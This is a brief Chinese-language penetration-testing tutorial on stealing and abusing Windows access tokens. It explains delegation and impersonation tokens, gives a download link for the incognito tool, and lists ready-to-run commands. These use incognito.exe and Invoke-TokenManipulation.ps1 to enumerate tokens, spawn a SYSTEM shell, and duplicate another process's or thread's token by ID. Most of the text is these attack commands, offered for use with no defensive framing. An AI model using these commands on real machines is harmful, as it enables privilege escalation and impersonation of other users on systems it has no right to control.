前言
很多时候我们大部分的认证都是密码认证,而windows中也有token认证,只要我们成功窃取到了token,也就相当是其他用户了。
token简介
令牌(token)是系统的临时秘钥,相当于账号和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。它允许你在不提供密码或其他凭证的前提下,访问网络和系统资源,这些令牌将持续存在于系统中,除非系统重新启动。
windows有两种类型的token:
授权令牌(Delegation token):用于本地及远程RDP 登录
模拟令牌(Impersonation token):用于非交互式的登录,比如,net use ,wmi,winrm 等等…
Token的窃取与利用需要管理员权限
incognito
程序地址:https://labs.mwrinfosecurity.com/assets/BlogFiles/incognito2.zip
查看token(需要管理员权限)
incognito.exe list_tokens -u
利用token,提权到system
incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe
Invoke-TokenManipulation.ps1
列举token:
Invoke-TokenManipulation -Enumerate
提权至system:
Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "nt authority\system"
看上图最后一行system的ProcessId是544,下面的命令Id也要对应
复制(窃取)进程token:
Invoke-TokenManipulation -CreateProcess "cmd.exe" -ProcessId 544
复制(窃取)线程token:
Invoke-TokenManipulation -CreateProcess "cmd.exe" -ThreadId 544
参考资料
渗透技巧-Token窃取与利用
窃取,伪造模拟各种windows访问令牌
窃取,伪造模拟各种windows访问令牌(备用链接)
内网渗透之AccessToken窃取与利用